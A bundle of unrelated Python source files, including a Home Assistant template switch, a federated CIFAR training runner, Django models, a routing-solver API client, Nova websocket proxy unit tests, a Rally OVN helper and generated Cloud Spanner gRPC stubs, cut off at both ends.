        availability_template = device_config.get(CONF_AVAILABILITY_TEMPLATE)
        on_action = device_config[ON_ACTION]
        off_action = device_config[OFF_ACTION]
        unique_id = device_config.get(CONF_UNIQUE_ID)

        switches.append(
            SwitchTemplate(
                hass,
                device,
                friendly_name,
                state_template,
                icon_template,
                entity_picture_template,
                availability_template,
                on_action,
                off_action,
                unique_id,
            )
        )

    return switches


async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
    """Set up the template switches."""

    await async_setup_reload_service(hass, DOMAIN, PLATFORMS)
    async_add_entities(await _async_create_entities(hass, config))


class SwitchTemplate(TemplateEntity, SwitchEntity, RestoreEntity):
    """Representation of a Template switch."""

    def __init__(
        self,
        hass,
        device_id,
        friendly_name,
        state_template,
        icon_template,
        entity_picture_template,
        availability_template,
        on_action,
        off_action,
        unique_id,
    ):
        """Initialize the Template switch."""
        super().__init__(
            availability_template=availability_template,
            icon_template=icon_template,
            entity_picture_template=entity_picture_template,
        )
        self.entity_id = async_generate_entity_id(
            ENTITY_ID_FORMAT, device_id, hass=hass
        )
        self._name = friendly_name
        self._template = state_template
        domain = __name__.split(".")[-2]
        self._on_script = Script(hass, on_action, friendly_name, domain)
        self._off_script = Script(hass, off_action, friendly_name, domain)
        self._state = False
        self._unique_id = unique_id

    @callback
    def _update_state(self, result):
        super()._update_state(result)
        if isinstance(result, TemplateError):
            self._state = None
            return
        self._state = result.lower() in ("true", STATE_ON)

    async def async_added_to_hass(self):
        """Register callbacks."""

        if self._template is None:

            # restore state after startup
            await super().async_added_to_hass()
            state = await self.async_get_last_state()
            if state:
                self._state = state.state == STATE_ON

            # no need to listen for events
        else:
            self.add_template_attribute(
                "_state", self._template, None, self._update_state
            )

        await super().async_added_to_hass()

    @property
    def name(self):
        """Return the name of the switch."""
        return self._name

    @property
    def unique_id(self):
        """Return the unique id of this switch."""
        return self._unique_id

    @property
    def is_on(self):
        """Return true if device is on."""
        return self._state

    @property
    def should_poll(self):
        """Return the polling state."""
        return False

    async def async_turn_on(self, **kwargs):
        """Fire the on action."""
        await self._on_script.async_run(context=self._context)
        if self._template is None:
            self._state = True
            self.async_write_ha_state()

    async def async_turn_off(self, **kwargs):
        """Fire the off action."""
        await self._off_script.async_run(context=self._context)
        if self._template is None:
            self._state = False
            self.async_write_ha_state()

    @property
    def assumed_state(self):
        """State is assumed, if no template given."""
        return self._template is None

# Copyright 2021, Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Federated CIFAR-10 classification library using TFF."""

import functools
from typing import Callable, Optional
from absl import logging

import tensorflow as tf
import tensorflow_federated as tff

from fedopt_guide import training_loop
from utils.datasets import cifar10_dataset
from utils.models import resnet_models

CIFAR_SHAPE = (32, 32, 3)
NUM_CLASSES = 100


def run_federated(
    iterative_process_builder: Callable[..., tff.templates.IterativeProcess],
    client_epochs_per_round: int,
    client_batch_size: int,
    clients_per_round: int,
    client_datasets_random_seed: Optional[int] = None,
    crop_size: Optional[int] = 24,
    total_rounds: Optional[int] = 1500,
    experiment_name: Optional[str] = 'federated_cifar10',
    root_output_dir: Optional[str] = '/tmp/fed_opt',
    uniform_weighting: Optional[bool] = False,
    **kwargs):
  """Runs an iterative process on the CIFAR-10 classification task.

  This method will load and pre-process dataset and construct a model used for
  the task. It then uses `iterative_process_builder` to create an iterative
  process that it applies to the task, using
  `federated_research.utils.training_loop`.
  We assume that the iterative process has the following functional type
  signatures:
    *   `initialize`: `( -> S@SERVER)` where `S` represents the server state.
    *   `next`: `<S@SERVER, {B*}@CLIENTS> -> <S@SERVER, T@SERVER>` where `S`
        represents the server state, `{B*}` represents the client datasets,
        and `T` represents a python `Mapping` object.
  The iterative process must also have a callable attribute `get_model_weights`
  that takes as input the state of the iterative process, and returns a
  `tff.learning.ModelWeights` object.

  Args:
    iterative_process_builder: A function that accepts a no-arg `model_fn`, and
      returns a `tff.templates.IterativeProcess`. The `model_fn` must return a
      `tff.learning.Model`.
    client_epochs_per_round: An integer representing the number of epochs of
      training performed per client in each training round.
    client_batch_size: An integer representing the batch size used on clients.
    clients_per_round: An integer representing the number of clients
      participating in each round.
    client_datasets_random_seed: An optional int used to seed which clients are
      sampled at each round. If `None`, no seed is used.
    crop_size: An optional integer representing the resulting size of input
      images after preprocessing.
    total_rounds: The number of federated training rounds.
    experiment_name: The name of the experiment being run. This will be appended
      to the `root_output_dir` for purposes of writing outputs.
    root_output_dir: The name of the root output directory for writing
      experiment outputs.
    uniform_weighting: Whether to weigh clients uniformly. If false, clients are
      weighted by the number of samples.
    **kwargs: Additional arguments configuring the training loop. For details on
      supported arguments, see `federated_research/utils/training_utils.py`.
  """

  crop_shape = (crop_size, crop_size, 3)

  cifar_train, _ = cifar10_dataset.get_federated_datasets(
      train_client_epochs_per_round=client_epochs_per_round,
      train_client_batch_size=client_batch_size,
      crop_shape=crop_shape)

  _, cifar_test = cifar10_dataset.get_centralized_datasets(
      crop_shape=crop_shape)

  input_spec = cifar_train.create_tf_dataset_for_client(
      cifar_train.client_ids[0]).element_spec

  model_builder = functools.partial(
      resnet_models.create_resnet18,
      input_shape=crop_shape,
      num_classes=NUM_CLASSES)

  loss_builder = tf.keras.losses.SparseCategoricalCrossentropy
  metrics_builder = lambda: [tf.keras.metrics.SparseCategoricalAccuracy()]

  def tff_model_fn() -> tff.learning.Model:
    return tff.learning.from_keras_model(
        keras_model=model_builder(),
        input_spec=input_spec,
        loss=loss_builder(),
        metrics=metrics_builder())

  if uniform_weighting:
    client_weight_fn = tff.learning.ClientWeighting.UNIFORM
  else:
    client_weight_fn = tff.learning.ClientWeighting.NUM_EXAMPLES

  training_process = iterative_process_builder(tff_model_fn, client_weight_fn)

  client_datasets_fn = functools.partial(
      tff.simulation.build_uniform_sampling_fn(
          dataset=cifar_train.client_ids,
          random_seed=client_datasets_random_seed),  # pytype: disable=wrong-keyword-args  # gen-stub-imports
      size=clients_per_round)

  evaluate_fn = tff.learning.build_federated_evaluation(
      tff_model_fn, use_experimental_simulation_loop=True)

  def validation_fn(model_weights, round_num):
    del round_num
    return evaluate_fn(model_weights, [cifar_test])

  def test_fn(model_weights):
    return evaluate_fn(model_weights, [cifar_test])

  logging.info('Training model:')
  logging.info(model_builder().summary())

  training_loop.run(
      iterative_process=training_process,
      train_client_datasets_fn=client_datasets_fn,
      evaluation_fn=validation_fn,
      test_fn=test_fn,
      total_rounds=total_rounds,
      experiment_name=experiment_name,
      root_output_dir=root_output_dir,
      **kwargs)

#coding=utf-8
from django.db import models
from django.contrib.auth.models import User

class Activity(models.Model):
    owner = models.ForeignKey(User, null=False)
    text = models.CharField(max_length=20, unique=True)

class Dessert(models.Model):
    activity = models.ForeignKey(Activity, null=False)
    description = models.TextField()
    photo = models.ImageField()

import time

from tsm.common.app import exception

import requests
import json
from requests.packages.urllib3.util.retry import Retry
from requests.adapters import HTTPAdapter

KANGROUTER_WEBSERVICE_APPLICATION_ROOT="/kangrouter/srv/v1"

class KangRouterClient:
  pathbase = "https://thesolvingmachine.com/kangrouter/srv/v1/solvers"
  def __init__(self,apiKey,licenseId):    
    self.headers = {"content-type": "application/json",
                    "Authorization": apiKey}
    self.params = {"licenseId" : licenseId }
    retries = Retry(total=5,
                    backoff_factor=0.75)
    self.session = requests.Session()
    self.session.mount(KANGROUTER_WEBSERVICE_APPLICATION_ROOT, 
                       HTTPAdapter(max_retries=retries))

  def validateReply(self,req):
    if req.status_code >= 400 and req.status_code <= 500:
      try:
        j = req.json()
      except ValueError:
        raise exception.InternalError(req.text,req.status_code)
      raise exception.jsonToException(req.json())

  def create(self,problem,**kwargs):
    path = self.pathbase
    payload=json.dumps(problem)
    params = self.params.copy()
    params.update(kwargs)
    req = self.session.post(path,
                        params=params, 
                        headers=self.headers,
                        data=payload)    
    self.validateReply(req)
    return req.text
    
  def delete(self,solverId):
    path = "{base}/{solverId}".format(base=self.pathbase,
                                      solverId=str(solverId))
    req = self.session.delete(path,
                          params=self.params,
                          headers=self.headers)
    self.validateReply(req)
    return True
    
  def stop(self,solverId):
    path = "{base}/{solverId}/stop".format(base=self.pathbase,
                                      solverId=str(solverId))
    req = self.session.put(path,
                       params=self.params,
                       headers=self.headers)
    self.validateReply(req)
    return True
    
  def getStatus(self,solverId):
    path = "{base}/{solverId}/status".format(base=self.pathbase,
                                      solverId=str(solverId))
    req = self.session.get(path,
                       params=self.params,
                       headers=self.headers)
    self.validateReply(req)
    return req.json()

  def getSolution(self,solverId):
    path = "{base}/{solverId}/solution".format(base=self.pathbase,
                                      solverId=str(solverId))
    req = self.session.get(path,
                       params=self.params,
                       headers=self.headers)
    self.validateReply(req)
    return req.json()
    
  # polling 
  def createAndWait(self,problem,cancel,**kwargs):
    solverId = self.create(problem,**kwargs)
    timeout = 300
    while not cancel() and timeout>0:
      status = self.getStatus(solverId)
      if status["execStatus"] =="invalid":
        raise exception.solverError(json.dumps(status["errors"]))
      if status["execStatus"] =="completed":
        return self.getSolution(solverId)
      time.sleep(1)
      timeout -= 1
    if timeout == 0:
      raise exception.InternalError("Timed out waiting for solver")
    raise exception.UserCancelled()
    

    

#!/usr/bin/env python

"""

This pretty much just tests creating a user, a universe, a planet, a building type name, a building
type, and a building.

"""

import os
import sys
import sqlalchemy
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
import legendary_waffle

# Database setup
db_engine = sqlalchemy.create_engine("sqlite://")
legendary_waffle.models.MODELBASE.metadata.create_all(db_engine)
legendary_waffle.models.MODELBASE.metadata.bind = db_engine
db_session = sqlalchemy.orm.sessionmaker(bind=db_engine)
db = db_session()

# Create the user
legendary_waffle.model_create(db, legendary_waffle.models.User, name='sk4ly')
print "Users: {}".format(legendary_waffle.model_read(db, legendary_waffle.models.User))

# Create the universe
universe_config = {
    "name": 'poopiverse',
    "map_size": 1000,
    "max_planets": 1000,
    "max_players": 10
}
legendary_waffle.model_create(db, legendary_waffle.models.Universe, **universe_config)
print "Universe: {}".format(legendary_waffle.model_read(db, legendary_waffle.models.Universe))

# Create the planet
planet_config = {
    "universe": 1, # The pkid of the universe 'poopiverse'
    "coordinate_x": 1,
    "coordinate_y": 1,
    "name": 'bloth',
    "habitable": True,
    "player_control": 1, # The pkid of user 'sk4ly'
    "default_condition": 1000,
    "default_resources": 1000,
    "current_condition": 1000,
    "current_resources": 1000
}
legendary_waffle.model_create(db, legendary_waffle.models.Planet, **planet_config)
print "Planet: {}".format(legendary_waffle.model_read(db, legendary_waffle.models.Planet))

# Create building type name
legendary_waffle.model_create(db, legendary_waffle.models.BuildingTypeName, name="Control Center")
print "Building Type Name: {}".format(legendary_waffle.model_read(db, legendary_waffle.models.BuildingTypeName))

# Create building type
building_type_config = {
    "typename": 1, # The pkid of the building type name 'Control Center'
    "description": "This is the control center",
    "default_condition": 100,
    "default_firepower": 0,
    "default_storage": 100,
    "rhr_passive": 0,
    "rhr_active": 0,
    "rhr_destructive": 0,
    "build_resource_reqs": 500,
}
legendary_waffle.model_create(db, legendary_waffle.models.BuildingType, **building_type_config)
print "Building Type: {}".format(legendary_waffle.model_read(db, legendary_waffle.models.BuildingType))

# Now create our new building
building_config = {
    "building_type": 1, # The pkid of the building type with the name 'Control Center'
    "universe": 1, # The pkid of the universe 'poopiverse'
    "planet": 1, # The pkid of the planet 'bloth'
    "player_control": 1, # The pkid of the user 'sk4ly'
}
legendary_waffle.model_create(db, legendary_waffle.models.Building, **building_config)
print "Building: {}".format(legendary_waffle.model_read(db, legendary_waffle.models.Building))

"""heroku_blog URL Configuration

The `urlpatterns` list routes URLs to views. For more information please see:
    https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
    1. Add an import:  from my_app import views
    2. Add a URL to urlpatterns:  url(r'^$', views.home, name='home')
Class-based views
    1. Add an import:  from other_app.views import Home
    2. Add a URL to urlpatterns:  url(r'^$', Home.as_view(), name='home')
Including another URLconf
    1. Import the include() function: from django.conf.urls import url, include
    2. Add a URL to urlpatterns:  url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import include, url
from django.contrib import admin
from blog.views import index, signup, login, logout

urlpatterns = [
    url(r'^$', index, name='index'),
    url(r'^signup', signup, name='signup'),
    url(r'^login', login, name='login'),
    url(r'^logout', logout, name='logout'),
    url(r'^admin/', include(admin.site.urls)),
]

# All Rights Reserved.
#
#    Licensed under the Apache License, Version 2.0 (the "License"); you may
#    not use this file except in compliance with the License. You may obtain
#    a copy of the License at
#
#         http://www.apache.org/licenses/LICENSE-2.0
#
#    Unless required by applicable law or agreed to in writing, software
#    distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
#    WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
#    License for the specific language governing permissions and limitations
#    under the License.

"""Tests for nova websocketproxy."""


import mock

from nova.console import websocketproxy
from nova import exception
from nova import test


class NovaProxyRequestHandlerBaseTestCase(test.TestCase):

    def setUp(self):
        super(NovaProxyRequestHandlerBaseTestCase, self).setUp()

        self.wh = websocketproxy.NovaProxyRequestHandlerBase()
        self.wh.socket = mock.MagicMock()
        self.wh.msg = mock.MagicMock()
        self.wh.do_proxy = mock.MagicMock()
        self.wh.headers = mock.MagicMock()

    @mock.patch('nova.consoleauth.rpcapi.ConsoleAuthAPI.check_token')
    def test_new_websocket_client(self, check_token):
        check_token.return_value = {
            'host': 'node1',
            'port': '10000'
        }
        self.wh.socket.return_value = '<socket>'
        self.wh.path = "ws://127.0.0.1/?token=123-456-789"

        self.wh.new_websocket_client()

        check_token.assert_called_with(mock.ANY, token="123-456-789")
        self.wh.socket.assert_called_with('node1', 10000, connect=True)
        self.wh.do_proxy.assert_called_with('<socket>')

    @mock.patch('nova.consoleauth.rpcapi.ConsoleAuthAPI.check_token')
    def test_new_websocket_client_token_invalid(self, check_token):
        check_token.return_value = False

        self.wh.path = "ws://127.0.0.1/?token=XXX"

        self.assertRaises(exception.InvalidToken,
                          self.wh.new_websocket_client)
        check_token.assert_called_with(mock.ANY, token="XXX")

    @mock.patch('nova.consoleauth.rpcapi.ConsoleAuthAPI.check_token')
    def test_new_websocket_client_novnc(self, check_token):
        check_token.return_value = {
            'host': 'node1',
            'port': '10000'
        }
        self.wh.socket.return_value = '<socket>'
        self.wh.path = "http://127.0.0.1/"
        self.wh.headers.getheader.return_value = "token=123-456-789"

        self.wh.new_websocket_client()

        check_token.assert_called_with(mock.ANY, token="123-456-789")
        self.wh.socket.assert_called_with('node1', 10000, connect=True)
        self.wh.do_proxy.assert_called_with('<socket>')

    @mock.patch('nova.consoleauth.rpcapi.ConsoleAuthAPI.check_token')
    def test_new_websocket_client_novnc_token_invalid(self, check_token):
        check_token.return_value = False

        self.wh.path = "http://127.0.0.1/"
        self.wh.headers.getheader.return_value = "token=XXX"

        self.assertRaises(exception.InvalidToken,
                          self.wh.new_websocket_client)
        check_token.assert_called_with(mock.ANY, token="XXX")

    @mock.patch('nova.consoleauth.rpcapi.ConsoleAuthAPI.check_token')
    def test_new_websocket_client_internal_access_path(self, check_token):
        check_token.return_value = {
            'host': 'node1',
            'port': '10000',
            'internal_access_path': 'vmid'
        }

        tsock = mock.MagicMock()
        tsock.recv.return_value = "HTTP/1.1 200 OK\r\n\r\n"

        self.wh.socket.return_value = tsock
        self.wh.path = "ws://127.0.0.1/?token=123-456-789"

        self.wh.new_websocket_client()

        check_token.assert_called_with(mock.ANY, token="123-456-789")
        self.wh.socket.assert_called_with('node1', 10000, connect=True)
        self.wh.do_proxy.assert_called_with(tsock)

    @mock.patch('nova.consoleauth.rpcapi.ConsoleAuthAPI.check_token')
    def test_new_websocket_client_internal_access_path_err(self, check_token):
        check_token.return_value = {
            'host': 'node1',
            'port': '10000',
            'internal_access_path': 'xxx'
        }

        tsock = mock.MagicMock()
        tsock.recv.return_value = "HTTP/1.1 500 Internal Server Error\r\n\r\n"

        self.wh.socket.return_value = tsock
        self.wh.path = "ws://127.0.0.1/?token=123-456-789"

        self.assertRaises(Exception, self.wh.new_websocket_client)  # noqa
        check_token.assert_called_with(mock.ANY, token="123-456-789")

# -*- cpy-indent-level: 4; indent-tabs-mode: nil -*-
# ex: set expandtab softtabstop=4 shiftwidth=4:
#
# Copyright (C) 2008,2009,2010,2011,2012,2013,2014,2018  Contributor
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Contains the logic for `aq add rack --bunker`."""

from aquilon.worker.broker import BrokerCommand  # pylint: disable=W0611
from aquilon.worker.commands.add_rack import CommandAddRack


class CommandAddRackBunker(CommandAddRack):

    required_parameters = ["bunker", "row", "column"]

# Copyright 2018 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
#   http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.

import netaddr

from rally.common import logging
from rally.common.utils import RandomNameGeneratorMixin

from rally_ovs.plugins.ovs import ovsclients
from rally_ovs.plugins.ovs import utils


LOG = logging.getLogger(__name__)


class OvnClientMixin(ovsclients.ClientsMixin, RandomNameGeneratorMixin):
    def _get_ovn_controller(self, install_method="sandbox"):
        ovn_nbctl = self.controller_client("ovn-nbctl")
        ovn_nbctl.set_sandbox("controller-sandbox", install_method,
                              self.context['controller']['host_container'])
        ovn_nbctl.set_daemon_socket(self.context.get("daemon_socket", None))
        return ovn_nbctl

    def _start_daemon(self):
        ovn_nbctl = self._get_ovn_controller(self.install_method)
        return ovn_nbctl.start_daemon()

    def _stop_daemon(self):
        ovn_nbctl = self._get_ovn_controller(self.install_method)
        ovn_nbctl.stop_daemon()

    def _restart_daemon(self):
        self._stop_daemon()
        return self._start_daemon()

    def _create_lswitches(self, lswitch_create_args, num_switches=-1):
        self.RESOURCE_NAME_FORMAT = "lswitch_XXXXXX_XXXXXX"

        if (num_switches == -1):
            num_switches = lswitch_create_args.get("amount", 1)
        batch = lswitch_create_args.get("batch", num_switches)

        start_cidr = lswitch_create_args.get("start_cidr", "")
        if start_cidr:
            start_cidr = netaddr.IPNetwork(start_cidr)

        mcast_snoop = lswitch_create_args.get("mcast_snoop", "true")
        mcast_idle = lswitch_create_args.get("mcast_idle_timeout", 300)
        mcast_table_size = lswitch_create_args.get("mcast_table_size", 2048)

        LOG.info("Create lswitches method: %s" % self.install_method)
        ovn_nbctl = self._get_ovn_controller(self.install_method)
        ovn_nbctl.enable_batch_mode()

        flush_count = batch
        lswitches = []
        for i in range(num_switches):
            name = self.generate_random_name()
            if start_cidr:
                cidr = start_cidr.next(i)
                name = "lswitch_%s" % cidr
            else:
                name = self.generate_random_name()

            other_cfg = {
                'mcast_snoop': mcast_snoop,
                'mcast_idle_timeout': mcast_idle,
                'mcast_table_size': mcast_table_size
            }

            lswitch = ovn_nbctl.lswitch_add(name, other_cfg)
            if start_cidr:
                lswitch["cidr"] = cidr

            LOG.info("create %(name)s %(cidr)s" % \
                      {"name": name, "cidr": lswitch.get("cidr", "")})
            lswitches.append(lswitch)

            flush_count -= 1
            if flush_count < 1:
                ovn_nbctl.flush()
                flush_count = batch

        ovn_nbctl.flush() # ensure all commands be run
        ovn_nbctl.enable_batch_mode(False)
        return lswitches

    def _create_routers(self, router_create_args):
        self.RESOURCE_NAME_FORMAT = "lrouter_XXXXXX_XXXXXX"

        amount = router_create_args.get("amount", 1)
        batch = router_create_args.get("batch", 1)

        ovn_nbctl = self._get_ovn_controller(self.install_method)
        ovn_nbctl.enable_batch_mode()

        flush_count = batch
        lrouters = []

        for i in range(amount):
            name = self.generate_random_name()
            lrouter = ovn_nbctl.lrouter_add(name)
            lrouters.append(lrouter)

            flush_count -= 1
            if flush_count < 1:
                ovn_nbctl.flush()
                flush_count = batch

        ovn_nbctl.flush() # ensure all commands be run
        ovn_nbctl.enable_batch_mode(False)

        return lrouters

    def _connect_network_to_router(self, router, network):
        LOG.info("Connect network %s to router %s" % (network["name"], router["name"]))

        ovn_nbctl = self.controller_client("ovn-nbctl")
        ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
                              self.context['controller']['host_container'])
        ovn_nbctl.enable_batch_mode(False)


        base_mac = [i[:2] for i in self.task["uuid"].split('-')]
        base_mac[0] = str(hex(int(base_mac[0], 16) & 254))
        base_mac[3:] = ['00']*3
        mac = utils.get_random_mac(base_mac)

        lrouter_port = ovn_nbctl.lrouter_port_add(router["name"], network["name"], mac,
                                                  str(network["cidr"]))
        ovn_nbctl.flush()


        switch_router_port = "rp-" + network["name"]
        lport = ovn_nbctl.lswitch_port_add(network["name"], switch_router_port)
        ovn_nbctl.db_set('Logical_Switch_Port', switch_router_port,
                         ('options', {"router-port":network["name"]}),
                         ('type', 'router'),
                         ('address', 'router'))
        ovn_nbctl.flush()

    def _connect_networks_to_routers(self, lnetworks, lrouters, networks_per_router):
        for lrouter in lrouters:
            LOG.info("Connect %s networks to router %s" % (networks_per_router, lrouter["name"]))
            for lnetwork in lnetworks[:networks_per_router]:
                LOG.info("connect networks %s cidr %s" % (lnetwork["name"], lnetwork["cidr"]))
                self._connect_network_to_router(lrouter, lnetwork)

            lnetworks = lnetworks[networks_per_router:]

# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc

from google.cloud.spanner_v1.proto import (
    result_set_pb2 as google_dot_cloud_dot_spanner__v1_dot_proto_dot_result__set__pb2,
)
from google.cloud.spanner_v1.proto import (
    spanner_pb2 as google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2,
)
from google.cloud.spanner_v1.proto import (
    transaction_pb2 as google_dot_cloud_dot_spanner__v1_dot_proto_dot_transaction__pb2,
)
from google.protobuf import empty_pb2 as google_dot_protobuf_dot_empty__pb2


class SpannerStub(object):
    """Cloud Spanner API

  The Cloud Spanner API can be used to manage sessions and execute
  transactions on data stored in Cloud Spanner databases.
  """

    def __init__(self, channel):
        """Constructor.

    Args:
      channel: A grpc.Channel.
    """
        self.CreateSession = channel.unary_unary(
            "/google.spanner.v1.Spanner/CreateSession",
            request_serializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.CreateSessionRequest.SerializeToString,
            response_deserializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.Session.FromString,
        )
        self.BatchCreateSessions = channel.unary_unary(
            "/google.spanner.v1.Spanner/BatchCreateSessions",
            request_serializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.BatchCreateSessionsRequest.SerializeToString,
            response_deserializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.BatchCreateSessionsResponse.FromString,
        )
        self.GetSession = channel.unary_unary(
            "/google.spanner.v1.Spanner/GetSession",
            request_serializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.GetSessionRequest.SerializeToString,
            response_deserializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.Session.FromString,
        )
        self.ListSessions = channel.unary_unary(
            "/google.spanner.v1.Spanner/ListSessions",
            request_serializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.ListSessionsRequest.SerializeToString,
            response_deserializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.ListSessionsResponse.FromString,
        )
        self.DeleteSession = channel.unary_unary(
            "/google.spanner.v1.Spanner/DeleteSession",
            request_serializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.DeleteSessionRequest.SerializeToString,
            response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
        )
        self.ExecuteSql = channel.unary_unary(
            "/google.spanner.v1.Spanner/ExecuteSql",
            request_serializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.ExecuteSqlRequest.SerializeToString,
            response_deserializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_result__set__pb2.ResultSet.FromString,
        )
        self.ExecuteStreamingSql = channel.unary_stream(
            "/google.spanner.v1.Spanner/ExecuteStreamingSql",
            request_serializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.ExecuteSqlRequest.SerializeToString,
            response_deserializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_result__set__pb2.PartialResultSet.FromString,
        )
        self.ExecuteBatchDml = channel.unary_unary(
            "/google.spanner.v1.Spanner/ExecuteBatchDml",
            request_serializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.ExecuteBatchDmlRequest.SerializeToString,
            response_deserializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.ExecuteBatchDmlResponse.FromString,
        )
        self.Read = channel.unary_unary(
            "/google.spanner.v1.Spanner/Read",
            request_serializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.ReadRequest.SerializeToString,
            response_deserializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_result__set__pb2.ResultSet.FromString,
        )
        self.StreamingRead = channel.unary_stream(
            "/google.spanner.v1.Spanner/StreamingRead",
            request_serializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.ReadRequest.SerializeToString,
            response_deserializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_result__set__pb2.PartialResultSet.FromString,
        )
        self.BeginTransaction = channel.unary_unary(
            "/google.spanner.v1.Spanner/BeginTransaction",
            request_serializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.BeginTransactionRequest.SerializeToString,
            response_deserializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_transaction__pb2.Transaction.FromString,
        )
        self.Commit = channel.unary_unary(
            "/google.spanner.v1.Spanner/Commit",
            request_serializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.CommitRequest.SerializeToString,
            response_deserializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.CommitResponse.FromString,
        )
        self.Rollback = channel.unary_unary(
            "/google.spanner.v1.Spanner/Rollback",
            request_serializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.RollbackRequest.SerializeToString,
            response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
        )
        self.PartitionQuery = channel.unary_unary(
            "/google.spanner.v1.Spanner/PartitionQuery",
            request_serializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.PartitionQueryRequest.SerializeToString,
            response_deserializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.PartitionResponse.FromString,
        )
        self.PartitionRead = channel.unary_unary(
            "/google.spanner.v1.Spanner/PartitionRead",
            request_serializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.PartitionReadRequest.SerializeToString,
            response_deserializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.PartitionResponse.FromString,
        )


class SpannerServicer(object):
    """Cloud Spanner API

  The Cloud Spanner API can be used to manage sessions and execute
  transactions on data stored in Cloud Spanner databases.
  """

    def CreateSession(self, request, context):
        """Creates a new session. A session can be used to perform
    transactions that read and/or modify data in a Cloud Spanner database.
    Sessions are meant to be reused for many consecutive
    transactions.

    Sessions can only execute one transaction at a time. To execute
    multiple concurrent read-write/write-only transactions, create
    multiple sessions. Note that standalone reads and queries use a
    transaction internally, and count toward the one transaction
    limit.

    Active sessions use additional server resources, so it is a good idea to
    delete idle and unneeded sessions.
    Aside from explicit deletes, Cloud Spanner can delete sessions for which no
    operations are sent for more than an hour. If a session is deleted,
    requests to it return `NOT_FOUND`.

    Idle sessions can be kept alive by sending a trivial SQL query
    periodically, e.g., `"SELECT 1"`.
    """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details("Method not implemented!")
        raise NotImplementedError("Method not implemented!")

    def BatchCreateSessions(self, request, context):
        """Creates multiple new sessions.

    This API can be used to initialize a session cache on the clients.
    See https://goo.gl/TgSFN2 for best practices on session cache management.
    """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details("Method not implemented!")
        raise NotImplementedError("Method not implemented!")

    def GetSession(self, request, context):
        """Gets a session. Returns `NOT_FOUND` if the session does not exist.
    This is mainly useful for determining whether a session is still
    alive.
    """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details("Method not implemented!")
        raise NotImplementedError("Method not implemented!")

    def ListSessions(self, request, context):
        """Lists all sessions in a given database.
    """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details("Method not implemented!")
        raise NotImplementedError("Method not implemented!")

    def DeleteSession(self, request, context):
        """Ends a session, releasing server resources associated with it. This will
    asynchronously trigger cancellation of any operations that are running with
    this session.
    """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details("Method not implemented!")
        raise NotImplementedError("Method not implemented!")

    def ExecuteSql(self, request, context):
        """Executes an SQL statement, returning all results in a single reply. This
    method cannot be used to return a result set larger than 10 MiB;
    if the query yields more data than that, the query fails with
    a `FAILED_PRECONDITION` error.

